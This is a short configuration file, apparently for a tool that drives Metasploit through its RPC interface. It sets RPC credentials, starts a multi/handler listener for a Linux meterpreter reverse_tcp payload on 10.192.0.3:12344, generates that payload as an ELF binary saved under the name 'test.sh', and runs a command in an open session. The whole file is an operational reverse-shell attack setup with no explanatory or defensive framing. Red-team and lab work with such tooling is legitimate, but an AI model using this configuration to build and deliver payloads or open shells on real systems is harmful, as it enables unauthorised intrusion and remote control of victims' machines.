[default]
msf_password = msfrpc
rpc_server = 10.192.0.3
rpc_port = 55559
rpc_ssl = True

[start_rpc]
rpc_user = msf
rpc_password = msfrpc
rpc_port = 55559

[run_module]
module = multi/handler
PAYLOAD = linux/x64/meterpreter/reverse_tcp
LHOST = 10.192.0.3
LPORT = 12344
ExitOnSession = false

[generate_payload]
format = elf
payload = linux/x64/meterpreter/reverse_tcp
lhost = 10.192.0.3
lport = 12344
output_file = test.sh

[get_jobs]
# No additional settings required as default values are reused

[get_sessions]
# No additional settings required as default values are reused

[run_command]
session_id = 4
session_command = ifconfig